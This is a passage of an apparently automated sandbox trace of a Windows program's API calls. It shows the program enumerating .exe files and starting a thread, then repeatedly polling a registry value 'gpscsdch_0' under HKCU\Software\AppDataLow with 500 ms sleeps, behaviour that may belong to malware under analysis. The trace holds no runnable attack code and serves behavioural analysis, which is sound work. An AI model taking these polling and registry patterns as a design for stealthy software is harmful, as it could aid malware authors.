	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] StrRChrW (lpStart="EaseOfAccessDialog.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] StrRChrW (lpStart="EhStorAuthn.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.051] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.051] FindClose (in: hFindFile=0x4cd5c8 | out: hFindFile=0x4cd5c8) returned 1
	[0071.051] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4077a0, lpParameter=0x4cfbd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194
	[0071.052] CloseHandle (hObject=0x194) returned 1
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.052] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] GetLastError () returned 0x0
	[0071.053] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fcb4, lpdwDisposition=0x0 | out: phkResult=0x203fcb4*=0x18c, lpdwDisposition=0x0) returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] GetLastError () returned 0x0
	[0071.054] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0071.054] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x198, lpdwDisposition=0x0) returned 0x0
	[0071.054] RegQueryValueExW (in: hKey=0x198, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x0, lpData=0x0, lpcbData=0x203fc88*=0x0) returned 0x2
	[0071.054] RegCloseKey (hKey=0x198) returned 0x0
	[0071.054] RegCloseKey (hKey=0x18c) returned 0x0
	[0071.055] Sleep (dwMilliseconds=0x1f4) 
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.627] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fcb4, lpdwDisposition=0x0 | out: phkResult=0x203fcb4*=0x22c, lpdwDisposition=0x0) returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.628] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] GetLastError () returned 0x0
	[0071.629] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0071.629] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x230, lpdwDisposition=0x0) returned 0x0
	[0071.629] RegQueryValueExW (in: hKey=0x230, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x0, lpData=0x0, lpcbData=0x203fc88*=0x0) returned 0x2
	[0071.629] RegCloseKey (hKey=0x230) returned 0x0
	[0071.629] RegCloseKey (hKey=0x22c) returned 0x0
	[0071.629] Sleep (dwMilliseconds=0x1f4) 
	[0072.130] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.131] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fcb4, lpdwDisposition=0x0 | out: phkResult=0x203fcb4*=0x338, lpdwDisposition=0x0) returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.132] GetLastError () returned 0x0
	[0072.133] GetLastError () returned 0x0
	[0072.133] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0072.133] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x334, lpdwDisposition=0x0) returned 0x0
	[0072.133] RegQueryValueExW (in: hKey=0x334, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x0, lpData=0x0, lpcbData=0x203fc88*=0x0) returned 0x2
	[0072.133] RegCloseKey (hKey=0x334) returned 0x0
	[0072.133] RegCloseKey (hKey=0x338) returned 0x0
	[0072.133] Sleep (dwMilliseconds=0x1f4) 
	[0072.670] GetLastError () returned 0x0
	[0072.670] GetLastError () returned 0x0
	[0072.670] GetLastError () returned 0x0
	[0072.670] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.671] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fcb4, lpdwDisposition=0x0 | out: phkResult=0x203fcb4*=0x4a8, lpdwDisposition=0x0) returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] GetLastError () returned 0x0
	[0072.672] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0072.672] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x4c4, lpdwDisposition=0x0) returned 0x0
	[0072.672] RegQueryValueExW (in: hKey=0x4c4, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x0, lpData=0x0, lpcbData=0x203fc88*=0x0) returned 0x2
	[0072.672] RegCloseKey (hKey=0x4c4) returned 0x0
	[0072.672] RegCloseKey (hKey=0x4a8) returned 0x0
	[0072.672] Sleep (dwMilliseconds=0x1f4) 
	[0073.354] GetLastError () returned 0x0
	[0073.354] GetLastError () returned 0x0
	[0073.354] GetLastError () returned 0x0
	[0073.354] GetLastError () returned 0x0
	[0073.354] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.355] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fcb4, lpdwDisposition=0x0 | out: phkResult=0x203fcb4*=0x6ec, lpdwDisposition=0x0) returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
